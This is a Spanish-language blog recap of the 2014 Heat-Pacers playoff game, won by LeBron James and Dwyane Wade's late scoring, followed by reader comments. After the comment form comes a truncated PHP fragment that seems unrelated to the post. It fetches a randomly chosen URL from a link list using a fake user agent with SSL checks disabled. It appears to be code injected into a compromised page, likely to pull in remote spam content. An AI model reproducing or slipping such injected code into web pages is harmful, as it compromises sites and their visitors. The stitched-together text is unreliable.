La Crónica: Special Two

21 de May de 2014 por txusma

Lebron James y Dwyane Wade aparecieron en esos minutos que distinguen a las grandes estrellas de los simples buenos jugadores. Con el partido igualadísimo los 2 All-Star se combinaron para anotar 22 puntos (más que todos los Pacers juntos) en el último cuarto gracias a su 9 de 12 en tiros de campo. Un parcial de 10-0 protagonizado íntegramente por ambos decantó finalmente la balanza a favor de los de Florida.

El partido había sido muy disputado, intenso y duro en algunos momentos. Ya en el último periodo, David West cometió una dura falta sobre Lebron James que acabó con éste en el suelo y en una acción fortuita la rodilla de Wade impactó en la cabeza de Paul George. De todas maneras, el golpe no tuvo la culpa del poco acierto del alero de Indiana en la 1ª parte que finalizó con un 1 de 11 en TC, más concentrado en sujetar a Lebron que en otra cosa. En la 2ª parte se giraron las tornas y su rendimiento defensivo bajó espectacularmente, sobretodo en los últimos minutos, a la vez que anotaba canastas de calidad. Sin George, había sido Stephenson el que había liderado a los suyos y los mantenía en el partido. Lamentablemente, cuando parecía que los locales habían controlado el partido y tenían la oportunidad de finiquitarlo no fueron capaces de sujetar la tormenta perfecta de Lebron y Wade y acabaron dejando escapar una gran oportunidad de poner la eliminatoria a punto de caramelo.

Los Heat vencieron pero no convencieron y es que hará falta mucho más que Lebron y Wade para llevarse el anillo de este año. No se sabe qué pasará en el futuro pero a los Heat de ayer los Spurs se los meriendan en un plis plas.

PREMIOS

MVP: No hay discusión. Dwyane Wade y Lebron James acabaron siendo demasiado para los corales Pacers Blazers. 45 puntos, 12 rebotes y 13 asistencias entre ambos así como una gran actuación en el cuarto decisivo.

Sorpresa: Sólido Norris Cole desde el banco anotando tiros importantes para los suyos. 11 puntos con un 2 de 2 en T3.

Decepción: David West no tuvo el mejor día y se quedó en 10 puntos.

Esfuerzo en vano: Lance Stephenson igualó su mejor marca anotadora en playoffs con 25 puntos a los que añadió 6 rebotes y 7 asistencias.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Nacho dice:
    #1

    Txus, los corales son los Pacers! Si es que tan de mañana no se puede… jeje

      Citar

  2. Jose Luis dice:
    #2

    Bastante desacertado David West en tiros sencillos a 5 metros del aro, tuvo 3-4 que si hubieran entrado otro gallo hubiera cantado. Son esas canastas que si entran, dejan a tu rival a 3 en lugar de fallar y que se pongan 1 arriba.

      Citar

  3. GreenPride dice:
    #3

    Segundo partido interesantísimo en las Finales del Este. Esta claro que el duo de los Heat demostró por qué son los actuales campeones decantando el partido de su lado cuando más igualado estaba y quemaba el balón. Puede ser la diferencia entre estos Pacers y sus Heat, que en los momentos calientes no tuvieron el acierto ni la claridad necesarias para anotar ante la esta vez sí buena defensa de los de Florida.
    Hasta llegar a esos 4-5 minutos finales el partido había transcurrido igualadísimo con una muy buena defensa de Indiana a LeBron, Stephenson muy acertado y Hibbert haciendo daño bajo ambos tableros. Sólo el mal día en ataque de West (con problemas de faltas) y George había impedido que tuvieran lo de Indiana una buena ventaja en el marcador.
    El banco de Indiana tampoco tuvo su día y entre eso, Wade y alguna cosa de Cole y Bosh Miami consiguió manterse siempre cerca o delante hasta que sus estrellas decidieron en esos minutos finales.
    Ahora la serie se va a Miami, donde si Indiana sigue jugando a este nivel deberían tener sus opciones de ganar alguno de los dos partidos. Sin embargo, es de esperar que los Heat intenten forzar un poco la máquina tanto en defensa como en sus contraataques para sacar del ritmo a media cancha que ha dominado estos dos primeros encuentros y que favorece a los de Indiana.

      Citar

  4. txusma dice:
    #4

    Nacho:
    Txus, los corales son los Pacers! Si es que tan de mañana no se puede… jeje

    No se puede de ninguna manera… 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>